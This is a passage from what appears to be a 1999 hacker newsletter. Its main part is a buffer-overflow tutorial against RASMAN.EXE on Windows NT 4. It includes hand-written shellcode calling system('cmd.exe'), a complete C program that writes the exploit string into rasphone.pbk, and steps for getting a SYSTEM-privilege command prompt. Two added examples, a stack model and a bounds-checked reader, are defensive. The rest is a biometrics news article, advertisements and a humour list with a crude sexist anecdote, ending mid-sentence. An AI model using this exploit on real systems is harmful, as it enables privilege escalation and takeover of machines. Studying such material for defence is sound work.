Nulls can really complicate issues.
To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitrary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib, then run and debug it.
#include <windows.h>
#include <winbase.h>

typedef void (*MYPROC)(LPTSTR);

int main()
{
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    char dllbuf[11] = "msvcrt.dll";
    char sysbuf[7] = "system";
    char cmdbuf[8] = "cmd.exe";

    /* Map the C runtime DLL and look up its exported system() function */
    LibHandle = LoadLibrary(dllbuf);
    if (LibHandle == NULL)
        return 1;
    ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
    if (ProcAdd == NULL)
        return 1;

    /* Break here in the debugger to see the stack just before the call */
    (ProcAdd) (cmdbuf);
    return 0;
}
On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that, starting from the top of the stack, we find the address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are not too important. So to emulate this we need the null terminated "cmd.exe" string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( ):
-------------------- ESP (Top of the Stack)
XX
--------------------
XX
--------------------
XX
--------------------
XX
--------------------
C3
--------------------
08
--------------------
02
--------------------
78
--------------------
63 c
--------------------
6D m
--------------------
64 d
--------------------
2E .
--------------------
65 e
--------------------
78 x
--------------------
65 e
--------------------
00
-------------------- EBP (Bottom of the stack)
where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember
it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference
point.
Writing the Assembly.
This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because, as you can see, there are nulls in it and we can't have nulls. Because we have to build it, this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use:
mov esp, ebp
This moves the EBP into the ESP - remember we overwrite the EBP as well as the EIP, which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently, after we move the EBP into the ESP, the top of the stack will be found at 0x015DF124.
We then want to push EBP onto the stack. This is our return address.
push ebp
This has the effect of pushing the ESP down 4 bytes, and so the ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:
mov ebp,esp
This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look.
The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though the cmd.exe string isn't there yet, it will be, but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself - we'll use the EDI register.
xor edi,edi
This will set the EDI to 00000000 and then we push it onto the stack using
push edi
This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far, and don't forget we need a null tacked on the end of our string, so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for variety we'll just sub the ESP by 4.
sub esp,04h
Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point
and move 63, the hex value for a small "c" into the address offset from the EBP minus 8.
mov byte ptr [ebp-08h],63h
We do the same for the "m", the "d", the ".", the first "e", the "x" and the final "e".
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
Our stack now looks like this:
----------------------------------------------------- ESP
63 c
-----------------------------------------------------
6D m
-----------------------------------------------------
64 d
-----------------------------------------------------
2E .
-----------------------------------------------------
65 e
-----------------------------------------------------
78 x
-----------------------------------------------------
65 e
-----------------------------------------------------
00
----------------------------------------------------- EBP
All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system
( ) function.
We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:
mov eax, 0x780208C3
push eax
We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load
the address 8 bytes less than the EBP into a register:
lea eax,[ebp-08h]
The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:
push eax
With this done our stack is built and we are ready to call system ( ), but we don't call it directly - again we use the indirection of using our EBP as a reference point and call the address found at EBP minus 12 (or 0C in hex):
call dword ptr [ebp-0ch]
Here is all our code strung together.
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
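To make the stack arithmetic in the walkthrough above checkable, here is an added example in plain C that models the sequence step by step; it is not the article's code and is not part of any exploit, just a teaching model of the 32-bit stack frame being built. The register values are the article's (EBP overwritten with 0x015DF124, system( ) at 0x780208C3); the small byte array that stands in for memory and the MODEL_BASE and MODEL_SIZE constants are assumptions of this model. The final call is not modelled, but the layout it would see is checked: the pointer to "cmd.exe" ends up at [EBP-10h] and the address of system( ) at [EBP-0Ch], exactly the picture drawn earlier.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added model, not the article's code. MODEL_BASE/MODEL_SIZE are assumptions
   chosen so that every address the sequence touches lies inside mem[]. */
#define MODEL_BASE 0x015DF100u
#define MODEL_SIZE 0x40u

typedef struct {
    uint32_t esp, ebp, eax, edi;
    unsigned char mem[MODEL_SIZE];   /* stands in for the stack region */
} Cpu;

static int in_model(uint32_t addr, uint32_t len)
{
    return addr >= MODEL_BASE && addr - MODEL_BASE + len <= MODEL_SIZE;
}

/* x86 is little-endian: the low byte of a dword sits at the lowest address,
   which is why 0x780208C3 appears in memory as C3 08 02 78. */
static void write32(Cpu *c, uint32_t addr, uint32_t v)
{
    if (!in_model(addr, 4)) return;
    for (unsigned i = 0; i < 4; i++)
        c->mem[addr - MODEL_BASE + i] = (unsigned char)(v >> (8 * i));
}

uint32_t read32(const Cpu *c, uint32_t addr)
{
    uint32_t v = 0;
    if (!in_model(addr, 4)) return 0;
    for (unsigned i = 0; i < 4; i++)
        v |= (uint32_t)c->mem[addr - MODEL_BASE + i] << (8 * i);
    return v;
}

/* The stack grows towards lower addresses: ESP moves down, then the dword is stored. */
static void push(Cpu *c, uint32_t v) { c->esp -= 4; write32(c, c->esp, v); }

static void write8(Cpu *c, uint32_t addr, unsigned char b)
{
    if (in_model(addr, 1)) c->mem[addr - MODEL_BASE] = b;
}

/* Run the article's instruction sequence up to, but not including, the final call. */
Cpu run_model(void)
{
    Cpu c;
    memset(&c, 0xCC, sizeof c);          /* 0xCC marks bytes never written */
    c.ebp = 0x015DF124u;                 /* the value the overwritten EBP holds */
    c.esp = c.ebp;                       /* mov esp,ebp */
    push(&c, c.ebp);                     /* push ebp     ESP -> 0x015DF120 */
    c.ebp = c.esp;                       /* mov ebp,esp  (prologue complete) */
    c.edi = 0;                           /* xor edi,edi */
    push(&c, c.edi);                     /* push edi     four nulls, ESP -> 0x015DF11C */
    c.esp -= 4;                          /* sub esp,04h  ESP -> 0x015DF118 */
    const char *s = "cmd.exe";
    for (unsigned i = 0; i < 7; i++)     /* mov byte ptr [ebp-08h+i],... */
        write8(&c, c.ebp - 8 + i, (unsigned char)s[i]);
    c.eax = 0x780208C3u;                 /* mov eax,0x780208C3 */
    push(&c, c.eax);                     /* push eax     lands at [ebp-0Ch] */
    c.eax = c.ebp - 8;                   /* lea eax,[ebp-08h] */
    push(&c, c.eax);                     /* push eax     lands at [ebp-10h] */
    return c;
}

/* The string at [ebp-08h]; its terminating null is the low byte "push edi" wrote. */
const char *cmd_string(const Cpu *c)
{
    return (const char *)&c->mem[c->ebp - 8 - MODEL_BASE];
}

/* 1 if the image matches the picture in the article, 0 otherwise. */
int stack_image_ok(const Cpu *c)
{
    return c->esp == c->ebp - 0x10u
        && strcmp(cmd_string(c), "cmd.exe") == 0
        && read32(c, c->ebp - 0x0Cu) == 0x780208C3u
        && read32(c, c->ebp - 0x10u) == c->ebp - 8u;
}

int main(void)
{
    Cpu c = run_model();
    for (uint32_t a = c.esp; a < c.ebp; a++)   /* dump ESP..EBP, one byte per line */
        printf("%08X: %02X\n", a, c.mem[a - MODEL_BASE]);
    printf("image %s the article's picture\n", stack_image_ok(&c) ? "matches" : "differs from");
    return stack_image_ok(&c) ? 0 : 1;
}
```

The dump shows why the pointer is pushed last: a `call` pushes its return address on top, so the callee finds the pushed pointer at [ESP+4], which is where a C-calling-convention function such as system( ) reads its first argument.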
The next thing to do is test this assembly to see if it works, so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes assembly language and incorporates it into a C program. As we are calling system ( ), which is exported by msvcrt.dll, we'll need to load that - we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail:
#include <windows.h>
#include <winbase.h>

int main()
{
    /* system ( ) lives in msvcrt.dll, so make sure it is mapped first */
    if (LoadLibrary("msvcrt.dll") == NULL)
        return 1;

    /* Build the stack image by hand and call system("cmd.exe") through it */
    __asm {
        mov esp,ebp
        push ebp
        mov ebp,esp
        xor edi,edi
        push edi
        sub esp,04h
        mov byte ptr [ebp-08h],63h
        mov byte ptr [ebp-07h],6Dh
        mov byte ptr [ebp-06h],64h
        mov byte ptr [ebp-05h],2Eh
        mov byte ptr [ebp-04h],65h
        mov byte ptr [ebp-03h],78h
        mov byte ptr [ebp-02h],65h
        mov eax, 0x780208C3
        push eax
        lea eax,[ebp-08h]
        push eax
        call dword ptr [ebp-0ch]
    }

    /* Not reached cleanly: the stack was rebuilt above and never restored */
    return 0;
}
Compile and link with kernel32.lib. When run this should start a new instance of the Command Interpreter, cmd.exe. There will be an access violation, however, when you exit that instance of the program - we've messed around with the stack and haven't cleaned up after ourselves.
That's it then - that's our arbitrary code, and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that, though, we need to get the op-codes for the above assembly.
This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp", etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitrary code. Below is an example of such a program with comments:
/* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in */
/* RASMAN.EXE - it will drop the user into a Command Prompt started by the system. */
/* It operates by re-writing the EIP and pointing it back into our exploit string which calls */
/* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on */
/* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[78] to buffer[81] */
/* in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by */
/* RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */
#include <stdio.h>
#include <windows.h>

int main (int argc, char *argv[])
{
    FILE *fd;
    int count=0;
    char buffer[1024];

    /* Make room for our stack so we are not overwriting anything we haven't */
    /* already overwritten. Fill this space with nops */
    while (count < 37)
    {
        buffer[count]=0x90;
        count ++;
    }

    /* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
    /* We build our own little stack here */
    /* mov esp,ebp */
    buffer[37]=0x8B;
    buffer[38]=0xE5;
    /*push ebp*/
    buffer[39]=0x55;
    /* mov ebp,esp */
    buffer[40]=0x8B;
    buffer[41]=0xEC;
    /* This completes our negotiation */

    /* We need some nulls */
    /* xor edi,edi */
    buffer[42]=0x33;
    buffer[43]=0xFF;

    /* Now we begin placing stuff on our stack */
    /* Ignore this NOP */
    buffer[44]=0x90;
    /*push edi */
    buffer[45]=0x57;
    /* sub esp,4 */
    buffer[46]=0x83;
    buffer[47]=0xEC;
    buffer[48]=0x04;

    /* When the system() function is called you ask it to start a program or command */
    /* eg system("dir c:\\"); would give you a directory listing of the c drive */
    /* The system () function spawns whatever is defined as the COMSPEC environment */
    /* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in */
    /* other words after running the command the cmd.exe process will exit. However, running */
    /* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn */
    /* another command prompt - one which won't go away on us. This is what we're going to do here*/

    /* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
    /* mov byte ptr [ebp-08h],63h */
    buffer[49]=0xC6;
    buffer[50]=0x45;
    buffer[51]=0xF8;
    buffer[52]=0x63;
    /* write the m to (EBP-7)*/
    /* mov byte ptr [ebp-07h],6Dh */
    buffer[53]=0xC6;
    buffer[54]=0x45;
    buffer[55]=0xF9;
    buffer[56]=0x6D;
    /* write the d to (EBP-6)*/
    /* mov byte ptr [ebp-06h],64h */
    buffer[57]=0xC6;
    buffer[58]=0x45;
    buffer[59]=0xFA;
    buffer[60]=0x64;
    /* write the . to (EBP-5)*/
    /* mov byte ptr [ebp-05h],2Eh */
    buffer[61]=0xC6;
    buffer[62]=0x45;
    buffer[63]=0xFB;
    buffer[64]=0x2E;
    /* write the first e to (EBP-4)*/
    /* mov byte ptr [ebp-04h],65h */
    buffer[65]=0xC6;
    buffer[66]=0x45;
    buffer[67]=0xFC;
    buffer[68]=0x65;
    /* write the x to (EBP-3)*/
    /* mov byte ptr [ebp-03h],78h */
    buffer[69]=0xC6;
    buffer[70]=0x45;
    buffer[71]=0xFD;
    buffer[72]=0x78;
    /*write the second e to (EBP-2)*/
    /* mov byte ptr [ebp-02h],65h */
    buffer[73]=0xC6;
    buffer[74]=0x45;
    buffer[75]=0xFE;
    buffer[76]=0x65;

    /* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */
    /* Use QuickView to get the entry point for system() if you have a different */
    /* version of msvcrt.dll and change these bytes accordingly */
    /* mov eax, 0x780208C3 */
    buffer[77]=0xB8;
    buffer[78]=0xC3;
    buffer[79]=0x08;
    buffer[80]=0x02;
    buffer[81]=0x78;
    /* Push this onto the stack */
    /* push eax */
    buffer[82]=0x50;
    /* now we load the address of our pointer to the cmd.exe string into EAX */
    /* lea eax,[ebp-08h]*/
    buffer[83]=0x8D;
    buffer[84]=0x45;
    buffer[85]=0xF8;
    /* and then push it onto the stack */
    /*push eax*/
    buffer[86]=0x50;
    /* now we call our system () function - all going well a command prompt will */
    /* be started, the parent process being rasman.exe */
    /*call dword ptr [ebp-0Ch] */
    buffer[87]=0xFF;
    buffer[88]=0x55;
    buffer[89]=0xF4;

    /* fill to our EBP with nops */
    count = 90;
    while (count < 291)
    {
        buffer[count]=0x90;
        count ++;
    }

    /* Re-write EBP */
    buffer[291]=0x24;
    buffer[292]=0xF1;
    buffer[293]=0x5D;
    buffer[294]=0x01;
    /* Re-write EIP */
    buffer[295]=0x26;
    buffer[296]=0xF1;
    buffer[297]=0x5D;
    buffer[298]=0x01;
    buffer[299]=0x00;
    buffer[300]=0x00;

    /* Print on the screen our exploit string */
    printf("%s", buffer);

    /* Open and create a file called rasphone.pbk */
    fd = fopen("rasphone.pbk", "w");
    if(fd == NULL)
    {
        printf("Operation failed\n");
        return 0;
    }
    else
    {
        fprintf(fd,"[Internet]\n");
        fprintf(fd,"Phone Number=");
        fprintf(fd,"%s",buffer);
        fprintf(fd,"\n");
        fclose(fd);
    }
    return 0;
}
When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitrary code. When RASMAN.EXE opens this file it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure, which contains the character arrays. As you'll have guessed, we're overflowing the one that holds the telephone number.
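The defect in both the name[31] example at the start of the article and the RASMAN phone-number field is the same: a value of attacker-chosen length is copied into a fixed-size array with no check against the array's size. As an added, defensive example (not the article's code and not RASMAN's), here is a reader for the "Phone Number=" value of a rasphone.pbk section that checks the value against the destination size before copying a single byte and rejects anything that would not fit, so a 300-byte "number" is refused instead of being written past the end of the field. The field size PHONE_FIELD_LEN and the set of allowed dial characters are assumptions; the phone-book texts are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added, defensive example; not the article's code and not RASMAN's.
   PHONE_FIELD_LEN stands in for the size of the fixed-size field the value is
   copied into; the real structure's size is not given on the page. */
#define PHONE_FIELD_LEN 128
#define PHONE_KEY "Phone Number="

enum pbk_status { PBK_OK = 0, PBK_NO_ENTRY, PBK_TOO_LONG, PBK_BAD_CHAR };

/* Digits plus the usual modem dial modifiers and separators (assumption). */
static int dial_char_ok(unsigned char ch)
{
    return ch != '\0' && (isdigit(ch) || strchr("+*#,;() -", ch) != NULL);
}

/* Copy the phone number of [section] into out (outsz bytes). The length is
   checked against outsz before anything is copied, which is exactly the check
   the overflowed structure fill lacked; on any failure out is left empty. */
int pbk_get_phone(const char *pbk, const char *section, char *out, size_t outsz)
{
    const size_t keylen = sizeof PHONE_KEY - 1;
    const size_t seclen = strlen(section);
    const char *p = pbk;
    int in_section = 0;

    if (outsz == 0) return PBK_TOO_LONG;
    out[0] = '\0';
    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len > 0 && p[len - 1] == '\r') len--;           /* tolerate CRLF */

        if (len >= 2 && p[0] == '[' && p[len - 1] == ']') {
            in_section = (len - 2 == seclen) && strncmp(p + 1, section, seclen) == 0;
        } else if (in_section && len >= keylen && strncmp(p, PHONE_KEY, keylen) == 0) {
            const char *val = p + keylen;
            size_t vlen = len - keylen;
            if (vlen >= outsz) return PBK_TOO_LONG;          /* reject; never copy past the field */
            for (size_t i = 0; i < vlen; i++)
                if (!dial_char_ok((unsigned char)val[i])) return PBK_BAD_CHAR;
            memcpy(out, val, vlen);
            out[vlen] = '\0';
            return PBK_OK;
        }
        p = eol ? eol + 1 : p + strlen(p);
    }
    return PBK_NO_ENTRY;
}

/* Constructed phone-book texts for trying the reader offline. */
static const char GOOD_PBK[] =
    "[Office]\r\nPhone Number=1234\r\n[Internet]\nPhone Number=0800123456\nDevice=Modem\n";
static const char BAD_PBK[] = "[Internet]\nPhone Number=555\x90\x90\n";

/* Build a phone book whose number is n_as capital As, like the probe in the
   article; returns the text length, or -1 if buf is too small. */
int build_long_pbk(char *buf, size_t bufsz, size_t n_as)
{
    const char head[] = "[Internet]\n" PHONE_KEY;
    size_t hlen = sizeof head - 1;
    if (hlen + n_as + 2 > bufsz) return -1;
    memcpy(buf, head, hlen);
    memset(buf + hlen, 'A', n_as);
    buf[hlen + n_as] = '\n';
    buf[hlen + n_as + 1] = '\0';
    return (int)(hlen + n_as + 1);
}

int main(void)
{
    char num[PHONE_FIELD_LEN], big[512];
    int st = pbk_get_phone(GOOD_PBK, "Internet", num, sizeof num);
    printf("Internet: status %d, number \"%s\"\n", st, num);
    build_long_pbk(big, sizeof big, 300);
    printf("300 As:   status %d (2 = too long)\n", pbk_get_phone(big, "Internet", num, sizeof num));
    printf("bad char: status %d (3 = bad char)\n", pbk_get_phone(BAD_PBK, "Internet", num, sizeof num));
    return 0;
}
```

Rejecting is chosen over silent truncation so that a caller cannot be tricked into dialling a different number than the one configured; the character check is a second, independent line of defence, since a dial string never legitimately contains opcode bytes.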
Now to test it all.
Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been
tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3 all running on a Pentium processor and it works - that's not to say that it will
run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So any way, let's test it:
To be able to get this to work take the following steps:
1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change
permission so there shouldn't be a problem with this.
2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new
one.
3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it.
4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's
domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail
account's properties.
5) Hang up and close Outlook Express.
6) Delete the new rasphone.pbk and replace it with the one made from the above code.
7) Open Outlook Express.
Because you're not connected to the Internet, RASMAN should automatically dial for you, read in from the Registry the autodial information, then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges.
That's it - we've exploited a buffer overrun and executed our arbitary code.
@HWA
55.0 More on biometrics
~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
ZDNET ON BIOMETRICS
by BHZ, Thursday 20th May 1999 on 10.15 pm CET
Biometric security is well established now. Quick note: this is the branch of computer security where you don't need passwords but can be recognized by your thumb, eye or voice. ZDNet published an article about current biometric products, prices and standards. Read the article below.
http://www.zdnet.com/anchordesk/story/story_3395.html?chkpt=ad1qsfp
Berst Alert
WEDNESDAY, MAY 19, 1999
The Biometrics
Revolution
Jesse Berst, Editorial Director
ZDNet AnchorDesk
Our ever-frugal Tech Director Jon DeKeles strolled into the office the other day and
offered to buy everyone lunch. After I picked myself up off the floor, I demanded to see his ID. Some
alien creature had obviously taken control of his body -- lab coat and all.
If AnchorDesk had the latest biometric technology, I wouldn't ask for ID. I'd have voice-authentication
software to compare Jon's voice against an earlier voice-capture. Or I'd put him in front of a camera
lens to scan his iris and match it against iris codes in the database. The rapidly evolving science of
biometrics uses unique physical attributes -- voice, fingerprint, iris -- to identify users. Biometric
security products exist now. But it will be another year at least before we start realizing their full
potential. Here's a look at where the biometric roadmap will take us:
WHERE WE ARE
Biometrics have been around for decades. The public sector -- particularly military and law
enforcement -- were the early adopters. Today public agencies use biometrics for such things as
preventing welfare fraud and determining eligibility for health care benefits. But usage outside of
government remains spotty, particularly in the enterprise, for several reasons:
Steep prices. Costs range from less than $100 for a basic reading device to thousands for a fully
integrated access system. But Gartner Group research director Jackie Fenn says costs are
dropping dramatically. That will be key to widespread adoption.
Lack of standards. Integrating biometric systems with mainstream PC technology is a headache IT
execs don't need. But there's movement toward standards among consortiums such as BioAPI.
(See link below.)
Early failures. Vendors admit fingerprint sensor tools introduced last year weren't as robust as they
needed to be -- a black mark on a fledgling industry.
WHERE WE'RE GOING
Government will continue to be a hot market for biometric security, but experts see huge potential in
the financial community and the medical industry. The security issues that haunt corporate IT and
ecommerce make them obvious markets for biometrics too. (For some fascinating biometric
applications, see today's Special Report.) Here's how the Gartner Group predicts the biometric
emergence will happen:
- 2000: Full-scale rollout of iris recognition for bank tellers and ATMs
- 2001: Fingerprint recognition becomes the remote access tool of choice for corporations that adopt biometrics
- 2002: Iris recognition gains lead over fingerprints for installations serving many users
What's your take on biometrics? Does the technology look like a long-term answer to our
security woes? Use TalkBack to tell me what you think. Or jump to my Berst Alert forum and hash it
out with other readers.
Too bad it's such a slow road to mainstream biometrics. Because some days I really do think
AnchorDesk has been possessed. No sooner had Jon offered to buy everyone lunch than our GenX
associate editor Nicci Noteboom asked if I wanted her to stay late and help me with a project.
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99

   SYSTEM NEWS: Canc0n99 is looking for more speakers and
   industry people to attend with booths and talks.
   You could have a booth and presentation for the cost of
   little more than a doorprize (tba). Contact us at our main
   address for info, hwa@press.usmc.net, and also join the mailing
   list for updates. This is the first Canadian event of its type
   and will have both white and black hat attendees, come out
   and shake hands with the other side... *g* mainly have some
   fun and maybe do some networking (both kinds). see ya there!

http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com
               ########################################
               # Support 2600.com and the Free Kevin  #
               # defense fund site, visit it now!     #
               # FREE KEVIN!                          #
               ########################################
www.2600.com www.freekevin.com www.kevinmitnick.com
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed           //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
The Top Ten Signs Your Co-worker Is a Computer Hacker.
10: You ticked him off once and your next phone bill was for $20,000.
9: He's won the Publisher's Clearing House sweepstakes 3 years running.
8: When asked for his phone number, he gives it in hex.
7: Seems strangely calm whenever the office LAN goes down.
6: Somehow gets HBO on his PC at work.
5: Mumbled, "Oh, puh-leeez" 95 times during the movie "The Net".
4: Massive 401k contribution made in half-cent increments.
3: His video dating profile lists "public-key encryption" among turn-ons.
2: When his computer starts up, you hear, "Good Morning, Mr. President".
1: You hear him murmur, "Let's see you use that Visa now, Professor I-Don't-Give-A's-In-Computer-Science!"
Most infamous things people do on their computer
http://www.vmnet.net/infamous.html
These are some of the better 'computer moments' we have found on the net. If you would like to add something just fill out the form below.
Our company used to sell time on our computers so very small companies that couldn't afford computers at the time could do their bookkeeping,
etc. One day, a new woman came in. She fumbled about for about 10 minutes but I paid no attention to her. Finally she came out and grumbled
something about how the computer wouldn't turn on. I grilled her with the usual obvious questions: Did you turn the switch on? Did you plug it in?
Did you turn on the switch on the power strip? She was sure she had done everything right. I was sure she neglected to plug one of the power cords
into the power strip. So, I went to investigate and she was *RIGHT*, she *HAD* plugged everything in to the power strip... including the power
strip's own power cord - talk about a ground loop!
A woman called the shop where she had bought a PC and complained that it didn't work properly: Every time she switched it on the screen was
filled with characters. Two technicians were sent out and were met by a woman with tits about twice the size of Dolly Parton's and glasses about
two centimeters thick. They asked her to switch on the computer. This she did, and then leaned over the keyboard to read what was on the
screen... The problem was quickly solved.
A tech support guy once told me that he got a call from someone saying that the computer screen just went black and the computer wouldn't
respond at all. The tech guy (starting with the obvious) asked the guy if the computer was still plugged in that maybe his foot had knocked the plug
out of the socket. The guy on the other end of the phone said to hold on that he would be back in a minute with a flashlight because the electricity
had just gone out in his building and he couldn't see under the desk without the lights....
I was trying to teach this sales person (for automated entrance system [they made gates]) how to enter his letters into Word Perfect. I told him to
select Word Perfect from his menu and when he did it gave him the opening screen which said, "Press any key to continue..." He looked at the
keyboard for awhile then asked me, "Where is the 'any' key?".
There is the classic one (which I hope is an urban myth) of the secretary working in an accounting firm who is told to make back up copies of the
discs every night. Every night she carefully collected together all the discs and took them away to copy them. After six months the hard disc crashed
but no-one was worried because they had backups, until the secretary brought in the huge pile of paper with a nice photocopied disc on each!
A user called the PC Support line of the university having trouble with her Mac. It was handed off to one of the Mac guys... "What seems to be the
problem?" "It's not working." Eyes roll. "What's not working?" "My Mac." - Five minutes of drawing the problem out of the woman deleted - "Okay,
to access the files on the disk click the mouse on the picture of the disk." Pause. Nothing happened. "I told you, I've already tried this." Support guy
makes as if he is strangling the phone. "Okay, do it again. Is the mouse moving?" "Yep." "On the screen?" "Yep." "Now click twice on the picture of
the disk." Pause and the consultant hears the two clicks again. "Nothing." "Ma'am, double-click once more for me." Clink-clink. "Ma'am, are you
hitting the screen with your mouse.......?"
While I was working in a placement office at the University, we helped students write their resumes on the computer. A student came up to me and
said he had problems reading the disk. I asked him to show it to me so I could see if I could recover the files. "Sure," he said, and took the disk (5
1/4" floppy) out of his pocket and unfolded it.
Another time, while working at a computer store, somebody who bought his computer from us was having trouble with one of his disks. The man
